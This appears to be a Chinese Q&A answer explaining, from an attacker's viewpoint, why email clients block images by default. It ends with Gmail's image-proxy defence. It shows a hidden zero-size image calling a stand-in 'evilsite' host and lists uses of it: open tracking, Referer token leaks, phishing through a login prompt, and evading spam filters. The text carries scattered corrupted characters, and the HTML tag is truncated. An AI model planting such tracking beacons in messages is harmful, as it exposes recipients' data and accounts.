站在黑客角度來(lái)給出答案���。
大多數(shù)專(zhuān)業(yè)郵箱都默認(rèn)不顯示圖片,因?yàn)椋?br/>
http://evilsite/hi.php width=0 height=0 />
看�,src的值可以不需要是真圖片。
這樣可以隱蔽地得到郵件URL(即Referer��,即瀏覽器地址欄那個(gè)URL)����。
有什么用呢?
1. 郵件打開(kāi)跟蹤:只要郵件被查看就會(huì)請(qǐng)求這個(gè)hi.php地址�����,hi.php可以做好記錄�����,除了記錄是否被請(qǐng)求了��,還可記錄郵件URL���、用戶(hù)瀏覽器User-Agent���、用戶(hù)IP地址等�����。這個(gè)可以做個(gè)郵件跟蹤系統(tǒng)了:)
有了這個(gè)��,根本不需要「已讀回執(zhí)」功能了�。
有了這個(gè)�����,搞垃圾郵件群發(fā)的����,各位腦補(bǔ)下��,他們會(huì)有多開(kāi)心�����。
2. 某些手機(jī)端郵箱:傳統(tǒng)的WAP或APP(本質(zhì)是Web的情況)��,Referer可能會(huì)包括用戶(hù)身份token�����,這會(huì)導(dǎo)致身份token輕易泄露,賬號(hào)被盜����。
3. 有人用hi.php來(lái)玩釣魚(yú)攻擊:hi.php可以被設(shè)置需要Auth等認(rèn)證,這時(shí)一查看郵箱就彈出一個(gè)Auth窗口���,提醒輸入用戶(hù)名密碼�����,只要場(chǎng)景設(shè)計(jì)好�,有一定概率�����,用戶(hù)會(huì)被釣魚(yú)�。
4. 確實(shí),圖片可以很好躲避基于文本的貝葉斯反垃圾機(jī)制�。默認(rèn)屏蔽圖片,「意外」屏蔽了這個(gè)眼不見(jiàn)心不煩的煩惱
就這么小的一個(gè)點(diǎn)��,這些年來(lái)一直出現(xiàn)各種對(duì)抗���,出現(xiàn)個(gè)對(duì)抗又被修復(fù)��。什么是好郵箱��?好郵箱就是這么小的一個(gè)點(diǎn)��,必須把控好安全與體驗(yàn)的那種平衡:)
目前Gmail采用的方式是用Google自己的服務(wù)器下載所有嵌入郵件的圖片����,之后在用戶(hù)打開(kāi)郵件時(shí)使用服務(wù)器上的那份。很安全��,并且相對(duì)更User-friendly一些��。
